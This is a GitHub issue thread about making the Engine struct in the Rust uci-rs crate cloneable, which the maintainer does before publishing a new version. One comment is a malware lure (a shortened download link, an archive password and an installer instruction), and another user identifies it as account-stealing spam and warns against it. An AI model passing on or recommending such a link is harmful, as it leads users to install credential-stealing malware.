### ISSUE TITLE
Make the Engine struct implement the Copy trait

### ISSUE THREAD

**Issue by mcoulont** [crazymerlyn/uci-rs#2]
Hello

Would you mind making the `Engine` struct implement the `Copy` and/or `Clone` trait(s)?

I'm trying to play several different moves from one position and get the different evaluations, and it would prevent me from instantiating every `Engine` object from scratch.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by mcoulont** [comment]
> Download https://bit.ly/3MjP129 password: changeme In the installer menu, select "gcc."

What's your URL about? It's kind of sus.

**Comment by MahouShoujoMivutilde** [comment]
Do **NOT** run it.

It's malware that'll steal your account if executed, to spread further spamming the same message elsewhere. 

There are a lot of comments like that

https://github.com/search?q=is%3Aissue+%22In+the+installer+menu%2C+select+%5C%22gcc.%5C%22%22+AND+%22password%3A+changeme%22&type=issues&s=created&o=desc

(and this is how I found this issue)

**Comment by crazymerlyn** [comment]
Made engine cloneable in 0717294a9d813b8f79cc9d411674fc86bbdceb4f. It does have the disadvantage of Engine not being Send anymore since multiple references to the same engine process running in separate threads would introduce data races. An alternative would be to use Mutexes but I don't think that's something a simple library like this should do by default. If synchronization across threads is needed, the client code can do that itself.

**Comment by mcoulont** [comment]
OK thanks. I'm not sure it's normal, but when I clone an Engine object, the position of the clone seems to be the initial position (even if there were only 2 kings in the position of the cloned engine).

I guess I'll have to manage the cloning by myself.

**Comment by mcoulont** [comment]
It works when I import your code. Could you publish the new version of the crate now please?

**Comment by crazymerlyn** [comment]
Huh, i thought i did publish it. Not sure why it wasn't. Published now.

**Comment by mcoulont** [comment]
Thanks
